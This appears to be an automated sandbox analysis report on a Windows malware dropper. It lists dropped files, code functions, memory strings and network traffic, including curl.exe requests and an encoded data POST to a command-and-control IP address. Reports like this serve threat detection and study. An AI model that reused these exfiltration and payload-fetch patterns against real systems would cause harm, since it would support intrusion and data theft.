Source: unknownHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 639Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 6a 45 38 4b 45 45 79 58 46 64 78 5a 33 42 78 58 6d 46 75 62 6d 64 73 63 56 78 44 63 48 42 45 59 58 52 68 58 6c 70 74 59 57 31 70 62 47 56 63 52 47 31 73 63 47 68 72 62 6b 78 31 62 33 4a 7a 58 44 41 35 4d 44 49 79 52 54 41 79 4c 7a 42 44 4d 44 49 6c 4e 6a 55 78 4f 79 38 30 4f 30 49 37 57 55 4a 66 4d 7a 49 77 4b 44 6b 34 4d 6a 73 7a 4b 48 64 70 62 6d 52 76 64 33 45 6f 5a 6d 56 6d 5a 57 78 6d 5a 58 4a 5a 51 46 30 78 4d 6a 41 69 4d 54 49 79 4d 54 41 6f 4d 54 55 36 4c 44 49 7a 4e 79 77 79 4d 6a 51 73 4f 6a 63 79 57 30 68 66 4d 7a 67 77 4b 44 4d 79 4d 6a 4d 77 4b 6a 4d 25 32 46 4d 43 77 77 4d 54 63 75 4d 6a 49 30 4c 6a 63 32 55 30 4a 64 4d 54 41 79 4b 44 45 77 4d 6a 45 78 4b 6a 4d 33 4d 43 34 77 4d 7a 55 75 4d 44 49 32 4c 44 55 30 57 55 4a 66 4d 69 6f 79 4d 6a 30 6f 51 7a 70 55 56 33 46 74 63 6e 46 65 59 32 35 6b 62 57 35 78 56 45 6c 79 63 6b 52 6a 64 47 46 63 55 6d 39 68 62 32 46 73 5a 31 78 45 62 57 35 77 61 47 74 75 52 48 56 76 63 48 74 63 59 33 68 32 64 79 78 6c 65 6d 64 5a 51 46 38 7a 4d 6a 41 71 4d 54 49 34 4d 7a 45 71 4f 54 55 36 4a 6a 49 7a 4e 79 77 77 4d 44 59 75 4e 54 78 54 51 6c 38 79 4b 44 49 77 4e 53 70 44 4f 6c 35 64 63 57 56 79 63 31 35 6a 62 47 5a 74 62 6e 4e 63 51 33 42 34 52 47 4e 32 59 56 78 51 62 32 4e 76 61 32 35 6c 58 6b 5a 76 62 48 42 71 59 57 78 45 64 57 56 79 63 56 52 34 61 6e 56 7a 4c 48 68 72 63 46 6c 49 56 54 4d 79 4d 43 67 78 4d 44 45 79 4d 79 70 42 4d 6c 35 56 63 32 56 77 63 56 78 68 62 6d 5a 76 62 6e 46 63 53 58 42 79 52 6d 46 30 59 31 78 51 62 57 4e 74 61 32 78 6c 58 45 52 76 62 6e 68 71 61 57 35 4d 64 32 39 34 63 31 35 36 61 6e 56 7a 4c 48 70 72 65 46 4e 43 58 7a 45 79 4d 43 6f 78 4d 44 41 78 4d 79 49 7a 4e 7a 67 75 4d 44 4d 31 4c 6a 41 79 4e 43 34 31 4e 46 4e 41 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKDkyMjE8KEEyXFdxZ3BxXmFubmdscVxDcHBEYXRhXlptYW1pbGVcRG1scGhrbkx1b3JzXDA5MDIyRTAyLzBDMDIlNjUxOy80O0I7WUJfMzIwKDk4MjszKHdpbmRvd3EoZmVmZWxmZXJZQF0xMjAiMTIyMTAoMTU6LDIzNywyMjQsOjcyW0hfMzgwKDMyMjMwKjM%2FMCwwMTcuMjI0Ljc2U0JdMTAyKDEwMjExKjM3MC4wMzUuMDI2LDU0WUJfMioyMj0oQzpUV3FtcnFeY25kbW5xVElyckRjdGFcUm9hb2FsZ1xEbW5waGtuRHVvcHtcY3h2dyxlemdZQF8zMjAqMTI4MzEqOTU6JjIzNywwMDYuNTxTQl8yKDIwNSpDOl5dcWVyc15jbGZtbnNcQ3B4RGN2YVxQb2Nva25lXkZvbHBqYWxEdWVycVR4anVzLHhrcFlIVTMyMCgxMDEyMypBMl5Vc2VwcVxhbmZvbnFcSXByRmF0Y1xQbWNta2xlXERvbnhqaW5Md294c156anVzLHpreFNCXzEyMCoxMDAxMyIzNzguMDM1LjAyNC41NFNAXw%3D%3D
Source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpString found in binary or memory: ftp://ftp.info-zip.org/pub/infozip
Source: curl.exe, 00000018.00000002.2549469870.0000000002829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.252/v10/ukyh
Source: curl.exe, 00000018.00000002.2549469870.0000000002829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.252/v10/ukyh.php?jspo=6
Source: curl.exe, 0000001F.00000002.2635866333.0000000002DE9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000031.00000002.2785207887.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000003A.00000002.2828321444.00000000033A9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000048.00000002.2929796324.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004E.00000002.2962664358.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000051.00000002.2978809870.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000060.00000002.3114079501.0000000003019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.
Source: curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.#
Source: curl.exe, 0000003A.00000002.2828321444.00000000033A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.%
Source: curl.exe, 00000031.00000002.2785207887.0000000002D29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.NNAME=ConsoleSh
Source: curl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.c
Source: curl.exe, 00000060.00000002.3114079501.0000000003019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?gi
Source: curl.exe, 0000004E.00000002.2962664358.0000000002A09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1
Source: curl.exe, 0000003A.00000002.2828321444.00000000033A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=31
Source: curl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldml
Source: curl.exe, 00000028.00000002.2695353799.00000000031D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D
Source: curl.exe, 00000031.00000002.2785207887.0000000002D29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D
Source: curl.exe, 0000001F.00000002.2635866333.0000000002DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=5
Source: curl.exe, 0000002E.00000002.2734583748.0000000002BB9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000042.00000002.2875914285.0000000002EB8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004B.00000002.2945763230.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000051.00000002.2978809870.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000054.00000002.3000425346.0000000003029000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000005B.00000002.3090746109.0000000002E09000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000063.00000002.3132233992.00000000034B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6
Source: curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=60%
Source: curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6Q
Source: curl.exe, 00000051.00000002.2978809870.00000000031E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6T
Source: curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6c
Source: curl.exe, 00000042.00000002.2875914285.0000000002EB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6h
Source: curl.exe, 00000048.00000002.2929796324.00000000035C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=7
Source: curl.exe, 00000048.00000002.2929796324.00000000035C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=7wk0
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Finish.com, 0000000A.00000000.2072323942.0000000000625000.00000002.00000001.01000000.00000007.sdmp, InnoSphere.scr, 00000010.00000000.2231353404.0000000000F05000.00000002.00000001.01000000.00000009.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: file.exe, RevenueDevices.exe.10.drString found in binary or memory: http://www.digicert.com/CPS0
Source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, zip.exe.52.drString found in binary or memory: http://www.info-zip.org/
Source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, zip.exe.52.dr, azvw.exe.10.drString found in binary or memory: http://www.info-zip.org/zip-bug.html;
Source: PsInfo.exe.52.dr, PsInfo64.exe.52.drString found in binary or memory: http://www.sysinternals.com
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Finish.com.1.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Los entropy: 7.99768365381Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Become entropy: 7.99784070507Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Howard entropy: 7.99757648221Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Vermont entropy: 7.99725611197Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Bt entropy: 7.99648411738Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Vatican entropy: 7.9972950771Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Mental entropy: 7.99804736681Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\768032\G entropy: 7.99966998402Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comFile created: C:\Users\user\AppData\Local\InnoSphere Dynamics\l entropy: 7.99966998402Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comFile created: C:\Users\user\AppData\Roaming\DolphinDumps\xhwq.zip entropy: 7.99812683975Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Showcase entropy: 7.99817987302Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Parts entropy: 7.99745443978Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Bailey entropy: 7.99784242676Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Samples entropy: 7.99803767944Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Considerations entropy: 7.99749833976Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Shepherd entropy: 7.99642551519Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Eight entropy: 7.99641122578Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Norman entropy: 7.99777953585Jump to dropped file
Source: curl.exeProcess created: 51
Source: cmd.exeProcess created: 60

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,88_2_00403883
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\ThouRevolutionJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\TmpMoon
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\NotifiedAaron
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\BrushSub
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\McLol
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040737E0_2_0040737E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406EFE0_2_00406EFE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004079A20_2_004079A2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004049A80_2_004049A8
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0040885052_2_00408850
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0040C82052_2_0040C820
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0040349052_2_00403490
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0041117052_2_00411170
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0040E90052_2_0040E900
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0040CE4952_2_0040CE49
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0040CE5052_2_0040CE50
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0040221052_2_00402210
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_00408EC052_2_00408EC0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_00417EE352_2_00417EE3
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_00402EF052_2_00402EF0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0040F28052_2_0040F280
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_00409FD052_2_00409FD0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_004093E052_2_004093E0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_2_0040497C88_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_2_00406ED288_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_2_004074BB88_2_004074BB
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\Desktop\file.exeCode function: String function: 004062CF appears 57 times
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: String function: 00412920 appears 282 times
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: String function: 00406640 appears 48 times
Source: file.exeStatic PE information: invalid certificate
Source: PsInfo.exe.52.drStatic PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows
Source: PsInfo64.exe.52.drStatic PE information: Resource name: BINRES type: PE32+ executable (console) x86-64, for MS Windows
Source: file.exe, 00000000.00000002.2037421930.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000003.2036612746.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal100.rans.spre.expl.evad.winEXE@323/65@3/2
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_00412830 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLastError,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,52_2_00412830
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comFile created: C:\Users\user\AppData\Local\InnoSphere DynamicsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3208:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1536:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_03
